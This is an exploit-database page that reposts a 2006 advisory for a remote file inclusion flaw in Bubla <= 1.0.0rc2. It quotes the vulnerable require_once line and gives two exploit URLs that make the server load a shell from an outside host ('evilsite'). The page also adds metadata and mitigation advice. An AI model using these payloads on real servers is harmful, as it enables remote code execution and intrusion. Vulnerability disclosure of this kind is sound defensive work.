header-logo
Suggest Exploit
vendor:
Bubla
by:
DeltasecurityTEAM
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Bubla
Affected Version From: 1.0.0rc1
Affected Version To: 1.0.0rc2
Patch Exists: NO
Related CWE: N/A
CPE: a:bubla:bubla:1.0.0rc2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Bubla <= 1.0.0rc2 Remote File Inclusion

A remote file inclusion vulnerability exists in Bubla <= 1.0.0rc2. The vulnerability is due to the 'bu_dir' and 'bu_config[dir]' parameters in the 'process.php' script not properly sanitized before being used in a 'require_once' function call. This can be exploited to include arbitrary remote files by e.g. passing a URL in the 'bu_dir' or 'bu_config[dir]' parameter.

Mitigation:

Input validation should be used to ensure that untrusted input is rejected. Additionally, the application should be configured to use a safe include path.
Source

Exploit-DB raw data:

**********************************************************************************************************
                                              DeltasecurityTEAM
                                              WwW.Deltasecurity.iR
**********************************************************************************************************

* Portal Name = Bubla <= 1.0.0rc2

* Class = Remote File Inclusion

* Risk = High (Remote File Execution)

* Download = http://download.sourceforge.net/pub/sourceforge/b/bu/bubla/bubla-1.0.0rc1.tar.gz

* Discoverd By = DeltahackingTEAM

* User In Delta Team = Davood_Cracker

* Conatact = Davood_cracker@yahoo.com

* 128 Bit Security Server= www.takserver.ir

* Just Delta Hacking Security TEAM *
--------------------------------------------------------------------------------------------
Vulnerable code in process.php

require_once($bu_dir."/bu_l2.php");

--------------------------------------------------------------------------------------------

- Exploit:

1.0.0 RC1 http://localhost/[PATH]/bu/process.php?bu_dir=http://evilsite/Shell.php?
1.0.0 RC2 http://localhost/[PATH]/bu/process.php?bu_config[dir]=http://evilsite/Shell.php?

--------------------------------------------------------------------------------------------

Gr33tz : Dr.Trojan , Hiv++ , D_7j , Vpc

SP TNX : Dr.Pantagon

**********************************************************************************************************

# milw0rm.com [2006-12-27]

Navigation

Suggest Exploit

Services By CQR